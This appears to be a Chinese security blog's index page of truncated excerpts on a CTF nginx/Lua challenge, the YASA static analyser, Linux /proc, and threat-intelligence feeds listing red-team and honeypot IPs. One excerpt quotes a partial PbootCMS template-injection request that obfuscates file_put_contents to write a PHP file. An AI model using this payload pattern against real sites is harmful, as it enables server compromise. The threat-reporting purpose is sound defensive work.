本题来自JLU SpiritCTF热身赛（level4）题目源码是nginx.config文件，考点是nginx下的lua库worker_processes 1; events { use epoll; worker_connections 10240; } http { include mime.types; ...

蚂蚁集团的YASA Enigne  v0.2.1开源了。其提供了一种静态审计代码I/O流安全性的的新方法。核心概念解释首先，需要理解静态应用程序安全测试（SAST） 工具（如 YASA）的基本工作流程：它们通过...

/proc目录Linux 内核提供了一种通过 /proc 文件系统，在运行时访问内核内部数据结构、改变内核设置的机制。proc文件系统是一个伪文件系统，它只存在内存当中，而不占用外存空间。它以文件系统...

累计流量 2.1W PV 倒计时 2025/06/27 第一版 倒计时 2025/07/31 第二版 累计更新境内外高威胁IP、蜜罐IP、漏洞情报 51期 暗痕IOC同步 6000+ 相关IP 紫兔IP威胁情报批量查询 上图源 2025/06/26 ...

江湖路远，再见时，愿各位依旧**“手中有EXP，心中无波澜”**！ 

PbootCMS 模板注入{pboot:if}是PbootCMS的条件判断标签，攻击者利用模板引擎漏洞执行任意PHP代码可能某个黑客路过尝试一下 GET /{pboot:if((\'file_put_co\'.\'ntents\')(\'temp.php\',(\'base6...

20250802162108362.xlsx下载xlsx文件风险信息 180.130.233.0/2414.204.197.0/24 批量扫描网站敏感文件

威胁情报IP库日更将变为周、月更；暗痕IOC同步时间更新。

IP类别地理位置47.117.147.15精选红队IP中国 上海2408:400a:1c:b965:243b:1693:493:846d精选红队IP中国 北京120.53.94.12精选红队IP中国 北京31.56.56.85境外威胁IP印度尼西亚 西爪哇省 茂物14....

IP类别地理位置39.104.16.201蜜罐陷阱IP中国 北京39.104.26.204蜜罐陷阱IP中国 北京47.122.60.73蜜罐陷阱IP中国 福建 福州121.37.207.154蜜罐陷阱IP中国 广东 广州47.120.27.40蜜罐陷阱IP中国 ...